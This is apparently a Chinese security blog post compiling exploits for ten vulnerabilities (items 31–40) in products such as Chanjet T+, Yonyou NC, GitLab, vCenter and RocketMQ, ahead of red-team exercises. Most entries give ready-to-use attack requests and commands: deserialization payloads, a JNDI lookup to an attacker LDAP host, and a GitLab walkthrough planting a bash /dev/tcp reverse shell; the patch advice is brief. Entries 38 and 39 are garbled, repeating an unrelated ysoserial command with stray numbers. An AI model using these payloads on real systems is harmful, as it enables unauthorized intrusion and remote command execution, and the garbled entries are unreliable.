正文

HW在即,你需要的40个高危漏洞利用与修复整合(四)

admin
admin V管理员 /0 评论 /85 阅读
1010
此篇文章发布距今已超过138天,您需要注意文章的内容或图片是否可用!

由于公众号文章篇幅限制,文章分批编辑,一篇文章发送10个漏洞。
随着时间推移,HW的时间也一步步推进,在此,我整合了40个高危漏洞,给出利用方法与解决方案供师傅们参考,创作不易,请师傅们多多点赞转发,感谢。
公众号查阅不便的话,请转发文章至朋友圈或安全交流群,截图找我领取原文档,联系方式可以在后台回复“联系方式”获取。

31、畅捷通 T+ 前台远程命令执行漏洞

由于畅捷通 T+前台存在反序列化漏洞,恶意攻击者成功利用此漏洞可在目标服务器上执行任意命令。
漏洞标签:服务器权限相关、利用链成熟、国产办公系统、利用条件简单
漏洞编号:QVD-2023-13615
漏洞类型RCE
受影响版本:

  1. T+13.0
  2. T+16.0

利用方法:
poc

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: your-ip
X-Ajaxpro-Method: GetStoreWarehouseByStore
 
{
  "storeID":{}
}

使用ysoserial.net工具构造payload

./ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -c "执行的命令"

exp

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: your-ip
X-Ajaxpro-Method: GetStoreWarehouseByStore
 
{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd""Arguments":"/c 执行的命令"
        }
    }
  }
}

修复建议
目前官方已修复该漏洞,受影响用户可以升级更新到安全版本。官方下载链接:
https://www.chanjetvip.com/product/goods/

32、泛微 e-cology 前台任意用户登录漏洞

泛微 e-cology 前台任意用户登录漏洞:泛微 e-cology9 部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
漏洞标签:利用链成熟、国产办公系统、利用条件简单
漏洞编号:
漏洞类型:认证绕过
受影响版本:

  1. 部分 e-cology9 并且补丁版本 < 10.57

利用方法:
poc

/mobile/plugin/1/ofsLogin.jsp?syscode=syscode&timestamp=2&gopage=3&receiver=test&loginTokenFromThird=

修复建议
目前,官方已发布修复建议,建议受影响的用户尽快升级至最新版本的补丁。
下载地址:
https://www.weaver.com.cn/cs/securityDownload.asp#

33、Openfire 控制台权限绕过漏洞

Openfire 的管理控制台是一个基于 Web 的应用程序,被发现可以使用路径遍历的方式绕过权限校验。成功利用后,未经身份验证的用户可以访问 Openfire管理控制台中的后台页面。同时由于 Openfire 管理控制台的后台ᨀ 供了安装插件的功能,所以攻击者可以通过安装恶意插件达成远程代码执行的效果。
漏洞标签:漏洞细节公开、服务器权限相关、利用条件简单
漏洞编号:CVE-2023-32315
漏洞类型:认证绕过
受影响版本:

  1. 3.10.0 <= Openfire < 4.6.8、4.7.5

利用方法:
exp
https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
运行指令

单个url go run main.go -u http://openfire.com:9090
多个url go run main.go -l url.txt -t 20

修复建议
临时缓解方案:
使用网络 ACL 限制访问控制台的来源,而且建议如非必要,不要将 Openfire管理控制台暴露在互联网上。
升级修复方案:
该问题已在 Openfire 的 4.7.4 和 4.6.8 版本中得到修补,建议升级到不受漏洞影响的版本。

34、Apache RocketMQ 远程代码执行漏洞

此漏洞是由于 CVE-2023-33246 补丁未修复完全,当 RocketMQ 的NameServer 组件暴露在外网,且缺乏有效的身份认证时,攻击者可以利用更新配置功能,以 RocketMQ 运行的系统用户身份执行任意命令。
漏洞标签:漏洞细节公开、影响范围广、漏洞价值大
漏洞编号:CVE-2023-37582
漏洞类型:RCE
受影响版本:

  1. RocketMQ < 4.9.7
  2. RocketMQ < 5.1.2

利用方法:
poc

import socket
import binascii
 
client = socket.socket()
client.settimeout(5)
 
client.connect((target_ip,target_port))
# make payload
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
 
body=('Thanks DawnT0wn').encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)
head1 = '00000000'+str(hex(json_lens))[2:]
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)

修复建议
目前官方已发布安全版本,建议受影响用户升级至:
· RocketMQ 5.x >= 5.1.2
· RocketMQ 4.x >= 4.9.7
官方补丁下载地址:
https://rocketmq.apache.org/download/
同时建议将 NameServer、Broker 等组件部署在内网,并增加权限认证

35、用友 NC Cloud 远程代码执行漏洞

用友 NC 及 NC Cloud 系统存在任意文件上传漏洞,攻击者可通过 uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给 NC 服务器预埋后门,从而可以随意操作服务器。
漏洞标签:漏洞细节公开、影响范围广、涉及重点系统、国产办公系统
漏洞编号:CNVD-C-2023-76801
漏洞类型:RCE
受影响版本:

  1. NC63、NC633、NC65
  2. NC Cloud1903、NC Cloud1909
  3. NC Cloud2005、NC Cloud2105、NC Cloud2111
  4. YonBIP 高级版 2207

利用方法:
exp
需要JNDI
https://github.com/WhiteHSBG/JNDIExploit

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/jndi.jsp"]}

EXP中使用的是JNDI工具的TomcatEcho回显链  
执行命令并回显

GET /jndi.jsp HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
cmd: whoami

修复建议

  1. 官方已经发布修复补丁,请进行升级。
  2. 或者进行 waf 等安全部署拦截恶意字符

36、Gitlab 远程代码执行漏洞

GitLab 某些端点的路径存在无需授权风险,攻击者可在无需认证的情况下完成图片上传,并利用该漏洞构造恶意数据执行远程命令,最终造成服务器敏感信息泄露或执行任意命令。
漏洞标签:利用链成熟、影响范围广
漏洞编号:CVE-2021-22205
漏洞类型:RCE
受影响版本:

  1. 11.9 <= GitLab(CE/EE)< 13.8.8
  2. 13.9 <= GitLab(CE/EE)< 13.9.6
  3. 13.10 <= GitLab(CE/EE)< 13.10.3

利用方法:
exp
https://github.com/Al1ex/CVE-2021-22205
运行指令

漏洞检测 python3 CVE-2021-22205.py -v true -t http://xx.xx.xx.xx:xx/
dnslog回显 python3 CVE-2021-22205.py -a true -t http://xx.xx.xx.xx:xx/ -c "curl http://xx.xx.xx.xx/1.txt"
反弹shell
# 写入反弹shell脚本
python3 CVE-2021-22205.py -a true -t http://xx.xx.xx.xx:xx/ -c "echo 'bash -i >& /dev/tcp/4.xx.xx.6/6666 0>&1' > /tmp/1.sh"
# 给执行权限
python3 CVE-2021-22205.py -a true -t http://xx.xx.xx.xx:xx/ -c "chmod +x /tmp/1.sh"
# 服务器监听6666端口
nc -lvnp 6666
# 运行,获取git权限shell
python3 CVE-2021-22205.py -a true -t http://xx.xx.xx.xx:xx/ -c "/bin/bash /tmp/1.sh"

修复建议
1、设置 Gitlab 仅对可信地址开放;
2、升级至安全版本:
GitLab(CE/EE) >= 13.8.8
GitLab(CE/EE) >= 13.9.6
GitLab(CE/EE) >= 13.10.3

37、Vmware vcenter 远程代码执行漏洞

vSphere Client(HTML5)在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,从而在服务器上写入 webshell,最终造成远程任意代码执行。
漏洞标签:利用链成熟、影响范围广、服务器权限相关
漏洞编号:CVE-2021-21972
漏洞类型:RCE
受影响版本:

  1. VMware vCenter Server 7.0 系列 < 7.0.U1c
  2. VMware vCenter Server 6.7 系列 < 6.7.U3l
  3. VMware vCenter Server 6.5 系列 < 6.5 U3n
  4. VMware ESXi 7.0 系列 < ESXi70U1c-17325551
  5. VMware ESXi 6.7 系列 < ESXi670-202102401-SG
  6. VMware ESXi 6.5 系列 < ESXi650-202102101-SG

利用方法:
poc

import requests
from requests.packages import urllib3
urllib3.disable_warnings()
import argparse
import os
def url():
  parser = argparse.ArgumentParser(description='vCenter 6.5-7.0 RCE 漏洞复现(CVE-2021-21972)POC')
  parser.add_argument('target_url',type=str,help='The target address,example: https://192.168.140.153:4445')
  args = parser.parse_args() 
  global url
  url = args.target_url
  if url.startswith('http://'or url.startswith('https://'):
   pass
  else:
   print('[-]Please include http:// or https:// in the URL!!')
   os._exit(0)
  if url.endswith('/'):
   url = url[:-1]
  print('[+]author:chenchen')
  print("[-]目标地址:",url)
  print("[-]正在执行漏洞检测...")
  return url
def poc():
 headers={
  'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36',
  "Content-Type":"application/x-www-form-urlencoded"
 }
 url_v = url + '/ui/vropspluginui/rest/services/updateova'
 try:
  code = requests.get(url=url_v,headers=headers,timeout=4,verify=False).status_code
  print('status_code:',code)
  if code == 405:
   print('[+]漏洞存在')
  else:
   print('[-]漏洞不存在')
 except:
  print('[-]发生错误')
if __name__ == '__main__':
 url()
 poc()

修复建议
vCenter Server7.0 版本升级到 7.0.U1c
vCenter Server6.7 版本升级到 6.7.U3l
vCenter Server6.5 版本升级到 6.5 U3n

38、金蝶 K3Cloud 反序列化漏洞

由于金蝶云星空能够使用 format 参数指定数据格式为二进制,攻击者可以通过发送由 BinaryFormatter 恶意序列化后的数据让服务端进行危险的BinaryFormatter 反序列化操作。反序列化过程中没有对数据进行签名或校验,导致攻击者可以在未授权状态下进行服务器远程代码执行。
漏洞标签:涉及重点系统、国产办公系统、服务器权限相关
漏洞编号:
漏洞类型:RCE
受影响版本:

  1. 金蝶云星空 < 6.2.1012.4
  2. 7.0.352.16 < 金蝶云星空 <7.7.0.202111
  3. 8.0.0.202205 < 金蝶云星空 < 8.1.0.20221110

利用方法:
poc
需要 ysoserial.net工具构造恶意序列化数据

./ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -c "执行的命令"
0
./ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -c "执行的命令"
1

exp

./ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -c "执行的命令"
2

修复建议
目前官方已发布安全补丁,受影响用户可以联系官方获取补丁。
https://vip.kingdee.com/knowledge/specialDetail/352491453127123200?category
=352491970117034240&id=388994085535220992&productLineId=1
缓解方案:
对于低于 PT123230 [6.2.1012.4]版本的金蝶云星空:
请禁止把金蝶云星空管理中心发布到公网访问,并使用防火墙设置能访问管理中心的 IP 白名单。如有需要发布到外网,或内网需要访问管理中心,可设置白名单进行控制,详情可参考:
https://vip.kingdee.com/article/248777993676668672?productLineId=1&isKnow
ledge=2

39、蓝凌 oa 远程代码执行漏洞

蓝凌 OA sysSearchMain.do 文件 存在任意文件写入漏洞,攻击者获取后台权限后可通过漏洞写入任意文件,也可以通过 custom.jsp 文件未授权写入恶意文件。
漏洞标签:涉及重点系统、国产办公系统、服务器权限相关
漏洞编号:
漏洞类型:RCE
受影响版本:

  1. 未知

利用方法:
poc

./ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -c "执行的命令"
3

修复建议
及时更新到最新版本。

40、Foxit PDF Reader 及 Editor 任意代码执行漏洞

Foxit PDF Reader 及 Editor 中存在任意代码执行漏洞,由于 Foxit PDFReader/Editor 未验证 exportXFAData 方法中的 cPath 参数,使得恶意的.hta 文件写入 Startup 目录中,攻击者可通过诱导受害者打开特制的 PDF 文档触发此漏洞,系统重启后将执行攻击者的恶意代码。
漏洞标签:涉及重点系统、社会工程学攻击、利用条件简单
漏洞编号:CVE-2023-27363
漏洞类型:RCE
受影响版本:

  1. Foxit PDF Reader <= 12.1.1.15289
  2. Foxit PDF Editor 12.x <= 12.1.1.15289
  3. Foxit PDF Editor 11.x <= 11.2.5.53785
  4. Foxit PDF Editor <= 10.1.11.37866

利用方法:
poc
https://github.com/j00sean/SecBugs/tree/main/CVEs/CVE-2023-27363
修复建议
目前官方已发布可更新版本,受影响用户可通过以下任一步骤进行更新:
1、在 Foxit PDF 阅读器或 Foxit PDF 编辑器中,点击“帮助”>“关于 Foxit PDF阅读器”或“关于 Foxit PDF 编辑器”>“检查更新”(对于 10 版本或更早的版本,点击“帮助”>“检查更新”)以更新到最新版本。
2、手动下载更新:
https://www.foxit.com/downloads/


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网